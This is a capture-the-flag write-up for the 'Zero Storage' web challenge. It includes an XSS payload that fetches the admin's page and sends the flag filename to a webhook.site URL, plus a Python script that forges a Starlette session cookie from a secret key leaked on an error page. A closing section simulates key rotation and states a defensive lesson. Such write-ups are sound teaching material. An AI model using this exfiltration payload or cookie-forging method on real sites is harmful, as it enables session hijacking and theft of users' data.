# ZERO STORAGE

* site: http://zero-storage-eof-ctf.csie.org:1310/
* If the uploaded file is HTML, it can be used for XSS.
* The session holds `id` and `file_list`; the session cookie is HttpOnly and signed.
* no dns rebind

## FLAG A

* For the admin to view the XSS file, you need to be the admin's friend.
* report URL: `http://zero-storage-eof-ctf.csie.org:1310/befriend?friend_name=cclin0816`
* report the XSS view: `http://zero-storage-eof-ctf.csie.org:1310/view?filename=-7uQTJAfMBqTnV-vFW7C4YK3gtK2wj-7.html`

```html=
<script>
// Read the admin's /home page; the link in the third "pure-u-1" block is the flag file
fetch("http://zero-storage-eof-ctf.csie.org:1310/home")
  .then((response) => response.text())
  .then((data) => {
    let parser = new DOMParser();
    let doc = parser.parseFromString(data, 'text/html');
    let f = doc.getElementsByClassName("pure-u-1")[2].getElementsByTagName("a")[0].innerText;
    // Send the filename out to the webhook
    fetch("https://webhook.site/127c4204-b073-4598-bbff-fd3afe6bffa5/?res=" + f);
  })
  .catch((error) => {
    fetch("https://webhook.site/127c4204-b073-4598-bbff-fd3afe6bffa5/?res=" + btoa(error));
  });
</script>
```

* Get the filename of the flag and view it: `http://zero-storage-eof-ctf.csie.org:1310/view?filename=maSAAkI-kiSHIbE-sONG-for-1310_hepHNKnZQntYd0pd.txt`
* FLAG{i_guess_I_run_OuT_of_IDEAs_ABouT_NuMbers......}

## FLAG B

```python
async def debug_user(request):
    # Access is gated on a flag stored in the (signed, client-held) session
    if not request.session.get('debug', False):
        return TemplateResponse('show.html', {'request': request, 'note': 'Permission denied'})
    uid = request.query_params.get('id', request.session.get('id', -1))
    async with db.execute('SELECT user, pass FROM users WHERE id = ?', (uid, )) as cursor:
        row = await cursor.fetchone()
    user, pas = (None, None) if row is None else row
    return TemplateResponse('show.html', {
        'request': request,
        'pre': True,
        'note': f'''id : {uid}
name: {user}
pass: {pas}
'''
    })
```

* The error page (accessing a page that does not exist) reveals the middleware's secret key: `Ludibrium-Secret-133.221.333.123.111_kvYAtbZkwkhyPv5B`
* `debug` in the session must be True; if the session has no `debug` key it defaults to False.
* The [Starlette source](https://github.com/encode/starlette/blob/master/starlette/middleware/sessions.py) contains the cookie-loading code.
![](https://i.imgur.com/NJ1SF3Z.png)

* Use this script to generate the session cookie and send it when loading `http://zero-storage-eof-ctf.csie.org:1310/debug_user?debug_user=admin` (Burp Suite works for this).

```python=
from base64 import b64encode
import json

import itsdangerous

# Secret key leaked by the error page. Starlette's SessionMiddleware wraps the
# key in a TimestampSigner and signs the base64-encoded JSON session.
signer = itsdangerous.TimestampSigner("Ludibrium-Secret-133.221.333.123.111_kvYAtbZkwkhyPv5B")
payload = {"id": 0, "filenames": [], "debug": True}
data = b64encode(json.dumps(payload).encode("utf-8"))
# Value to put in the session cookie
print(signer.sign(data).decode())
```

* FLAG{DO_u_rEMEmBeR_LudiBRIUM_s_Funny_tIME_makeR_bgM?}

###### tags: `solved`
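As an added illustration of why the leaked key is fatal in FLAG B (this is not part of the original writeup): a simplified stand-in for Starlette's session cookie format (base64 JSON, timestamp, HMAC; same structure as itsdangerous' TimestampSigner but not byte-compatible), together with the middleware's load path and the challenge's `debug` gate. A cookie minted with the leaked key loads as a trusted session, while rotating the key or exceeding `max_age` turns it back into an empty session; `ROTATED_KEY` is a constructed placeholder.

```python
import base64
import hashlib
import hmac
import json
import time

# Simplified stand-in for Starlette's SessionMiddleware + itsdangerous.TimestampSigner:
#   cookie = b64(json(session)) "." timestamp "." HMAC-SHA256(secret, b64 "." timestamp)
# Same structure as the real thing, but NOT byte-compatible with itsdangerous.
MAX_AGE = 14 * 24 * 60 * 60  # Starlette's default session lifetime (14 days)
LEAKED_KEY = "Ludibrium-Secret-133.221.333.123.111_kvYAtbZkwkhyPv5B"  # from the error page
ROTATED_KEY = "EXAMPLE-rotated-key-not-from-the-challenge"  # constructed placeholder


def _mac(secret, body):
    digest = hmac.new(secret.encode(), body.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).decode().rstrip("=")


def sign_session(session, secret, now=None):
    """What the middleware does on the way out: anyone holding `secret` can mint this."""
    data = base64.b64encode(json.dumps(session).encode("utf-8")).decode()
    body = f"{data}.{int(time.time()) if now is None else now}"
    return f"{body}.{_mac(secret, body)}"


def load_session(cookie, secret, max_age=MAX_AGE, now=None):
    """Mirror of the middleware's load path: bad or stale signature -> empty session."""
    try:
        data, ts, sig = cookie.rsplit(".", 2)
        age = (int(time.time()) if now is None else now) - int(ts)
    except ValueError:
        return {}
    if not hmac.compare_digest(_mac(secret, f"{data}.{ts}"), sig):
        return {}  # wrong key (e.g. after rotation) or tampered payload
    if age > max_age:
        return {}  # itsdangerous rejects this as expired; Starlette starts an empty session
    return json.loads(base64.b64decode(data))


def debug_allowed(session):
    """The challenge's gate: a client-held signed flag; a missing key defaults to False."""
    return bool(session.get("debug", False))


if __name__ == "__main__":
    forged = sign_session({"id": 0, "filenames": [], "debug": True}, LEAKED_KEY)
    print("leaked key :", debug_allowed(load_session(forged, LEAKED_KEY)))   # True
    print("rotated key:", debug_allowed(load_session(forged, ROTATED_KEY)))  # False
```

The takeaway for the defender is that a session flag like `debug` is only as trustworthy as the secret key, so the key must never reach an error page and should be rotated as soon as a leak is suspected.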